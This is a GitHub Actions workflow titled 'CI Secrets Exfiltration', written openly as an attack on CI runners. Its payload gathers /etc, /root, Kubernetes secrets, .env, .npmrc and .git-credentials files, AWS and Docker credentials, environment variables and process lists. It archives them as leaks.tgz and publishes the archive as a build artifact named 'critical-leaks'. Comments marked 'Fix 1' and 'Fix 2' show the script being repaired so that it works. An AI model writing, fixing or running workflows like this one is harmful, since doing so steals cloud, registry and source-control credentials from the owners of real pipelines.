name: CI Secrets Exfiltration

on:
  push:
    branches: [ main ]

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Build and Run Malicious Image
        run: |
          PAYLOAD=$(cat <<'EOF'
          cp -r /etc /loot/etc 2>/dev/null || true
          cp -r /root /loot/root 2>/dev/null || true
          cp -r /var/run/secrets /loot/var_run_secrets 2>/dev/null || true
          find / \( -name "*.env" -o -name ".npmrc" -o -name ".git-credentials" \) -exec cp --parents {} /loot/ 2>/dev/null \;
          env > /loot/full_env.txt
          ps aux > /loot/processes.txt
          netstat -tuln > /loot/network.txt
          (test -d ~/.aws && cp -r ~/.aws /loot/aws) || true
          (test -d ~/.docker && cp -r ~/.docker /loot/docker) || true
          tar -czf /leaks.tgz -C /loot .
          EOF
          )

          # Fix 1: Add a tag to the Docker image
          docker build --build-arg PAYLOAD="$PAYLOAD" -t secrets-leaker:latest .
          
          # Fix 2: Use the correct image name (no typo)
          docker run --rm -v $PWD:/out secrets-leaker:latest sh -c "cp /leaks.tgz /out/leaks.tgz || true"

      - name: Upload Artifact
        uses: actions/upload-artifact@v4
        with:
          name: critical-leaks
          path: leaks.tgz
